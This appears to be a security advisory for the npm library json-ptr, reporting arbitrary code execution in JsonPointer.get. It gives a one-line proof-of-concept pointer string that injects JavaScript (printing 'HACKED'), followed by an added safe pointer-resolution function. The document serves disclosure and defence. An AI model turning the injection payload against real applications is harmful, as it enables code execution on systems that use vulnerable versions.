json-ptr

vulnerability arbitrary code execution
severity 8.6
language typescript
registry npm

✍️ Description

json-ptr is a complete implementation of JSON Pointer (RFC 6901) for nodejs and modern browsers.

JsonPointer.get, which is designed to return the target object's value at the pointer's location, is vulnerable to arbitrary code injection and execution, mainly because the user-supplied pointer location is not sanitized.

🕵️‍♂️ Proof of Concept

// PoC.js
const jptr = require('json-ptr');
const JsonPointer = jptr.JsonPointer;
JsonPointer.get({}, '/aaa\'\]\)\) !== \'undefined\') \{return it;\}; console.log(\'HACKED\'); if((([\'a'); // HACKED

💥 Impact

This vulnerability allows execution of arbitrary JavaScript code.
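
A defensive counterpart, added here as an example and not taken from json-ptr or its fix: an RFC 6901 lookup that walks the document with plain property access, so the pointer is only ever used as a key and never becomes part of executable code. The names decodeToken, parsePointer and safeGet are hypothetical; pocPointer is the pointer string from the PoC above.

```javascript
// Added example (not json-ptr code): interpretive RFC 6901 getter.

// Decode one reference token: "~1" -> "/", then "~0" -> "~" (order per RFC 6901).
function decodeToken(token) {
  if (/~(?![01])/.test(token)) {
    throw new SyntaxError('invalid escape in JSON Pointer token');
  }
  return token.replace(/~1/g, '/').replace(/~0/g, '~');
}

// Split a pointer string into decoded tokens; "" addresses the whole document.
function parsePointer(pointer) {
  if (typeof pointer !== 'string') throw new TypeError('pointer must be a string');
  if (pointer === '') return [];
  if (pointer[0] !== '/') throw new SyntaxError('JSON Pointer must start with "/"');
  return pointer.slice(1).split('/').map(decodeToken);
}

// Resolve the pointer by property lookup; tokens are treated as data only.
function safeGet(doc, pointer) {
  let node = doc;
  for (const token of parsePointer(pointer)) {
    if (node === null || typeof node !== 'object') return undefined;
    if (Array.isArray(node)) {
      // Array index: "0" or digits without a leading zero.
      if (!/^(0|[1-9]\d*)$/.test(token)) return undefined;
      node = node[Number(token)];
    } else {
      // Own properties only, so "__proto__" and "constructor" never
      // resolve through the prototype chain.
      if (!Object.prototype.hasOwnProperty.call(node, token)) return undefined;
      node = node[token];
    }
  }
  return node;
}

// The pointer string from the PoC, as the single odd-looking key it is.
const pocPointer =
  "/aaa'])) !== 'undefined') {return it;}; console.log('HACKED'); if(((['a";

console.log(safeGet({}, pocPointer));                       // undefined
console.log(safeGet({ a: { 'b/c': [10, 20] } }, '/a/b~1c/1')); // 20
```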
